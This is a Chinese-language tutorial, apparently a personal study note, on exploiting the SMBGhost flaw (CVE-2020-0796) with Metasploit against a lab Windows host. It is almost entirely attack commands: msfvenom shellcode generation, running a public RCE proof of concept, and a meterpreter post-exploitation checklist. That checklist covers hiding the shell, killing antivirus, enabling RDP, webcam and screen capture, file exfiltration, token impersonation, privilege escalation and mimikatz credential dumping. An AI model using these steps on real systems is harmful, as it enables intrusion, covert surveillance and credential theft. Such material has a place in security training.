CVE-2020-0796的msf滲透



起始



    通過對靶機的掃描探測,發現靶機存在CVE-2020-0796漏洞(靶機至少分4G內存,要不會藍屏...)javascript

 




Shell獲取



01
1 使用msf生成shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f py -o shellcode.txt


將shellcode.txt文本中內容替換exp(https://github.com/chompie1337/SMBGhost_RCE_PoC)中exploit.py中的USER_PAYLOAD。java



02
在msf中開啓目標端口監聽

msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcppayload => windows/x64/meterpreter/bind_tcpmsf5 exploit(multi/handler) > set rhost 10.10.1.22rhost => 10.10.1.22msf5 exploit(multi/handler) > set lport 4445lport => 4445msf5 exploit(multi/handler) > exploit



03
執行攻擊腳本
python3 /home/guolala/桌面/SMBGhost_RCE_PoC-master/exploit.py -ip 10.10.1.22

 

    

    成功反彈shellpython

 




後滲透攻擊



01
進程遷移、隱藏shell

    剛得到Meterpreter shell時,該shell是很容易被發現的,因此第一步要把它和目標機中的一個穩定的進程綁定在一塊兒。

    獲取當前Meterpreter shell進行PID 。

getipd

 

 


    自動尋找合適的進程,而後遷移。nginx

run post/windows/manage/migrate

 

也能夠使用migrate遷移到指定的進程。git



02
常見系統命令

    sysinfo查看目標機的系統信息
Sysinfo

 


    查看機器運行時間github

Idletime

 


    查看路由信息web

route

 


    查看當前滲透成功的用戶名shell

getuid

 


    列舉當前登陸用戶
windows

run post/windows/gather/enum_logged_on_users

 


    列舉應用程序
微信

run post/windows/gather/enum_applications

 


    檢查是否爲虛擬機

run post/windows/gather/checkvm

 



03
實用操做

    關閉殺毒軟件

run post/windows/manage/killav

     


    開啓遠程桌面

run post/windows/manage/enable_rdp

  


    進入目標機shell

shell 

 



04
截屏與攝像頭

    加載Espia插件    

Load espia

    截屏

screengrab

 

    查看有沒有攝像頭

webcam_list

    打開攝像頭,使用攝像頭抓取一張照片。

Webcam_snap

    開啓直播模式

Webcam_stream




0 5
文件操做

    查看當前工做目錄

Pwd 

    查看當前所在目錄

Getlwd 


 


    列出當前目錄文件

Ls 

    搜索文件

search -f *.txt -d c:/111

 

    下載指定文件

download c:/111/test.txt

 


    上傳文件到指定目錄

upload /home/guolala/桌面/password.txt c:/111

 

 



6
提權操做

    先進入shell


    若是出現亂碼,鍵入:

chcp 65001

    查看咱們當前的權限

whoami /groups

 


    系統查看命令查看補丁安裝狀況

systeminfo 

 


    使用WMIC列出補丁

Wmic qfe get Caption,Description,HotFixID,InstalledOn

 


    自動提權命令

getsystem 

 




7
竊取令牌


    加載incognito插件

use incognito

    列出可用的token

list_tokens -u

 


    令牌假冒,假冒guolala用戶的令牌

impersonate_token DESKTOP-4SU3VVU\\guolala

 




8
hash攻擊


    

    使用hashdump抓取密碼

Hashdump

 

 

    使用smart_hashdump導出全部用戶的hash到文件

run windows/gather/smart_hashdump

 


    加載mimikatz插件

load mimikatz

    抓取系統hash值

Msv

 

    抓取系統票據

Kerberos

    抓取系統帳戶信息

wdigest


    抓取hash(沒抓成功,可能win10不支持)

mimikatz_command -f samdump::hashes

 


    查看進程

mimikatz_command -f handle::list

 






本文分享自微信公衆號 - 小啦的學習筆記(woshiguolala)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。

相關文章
相關標籤/搜索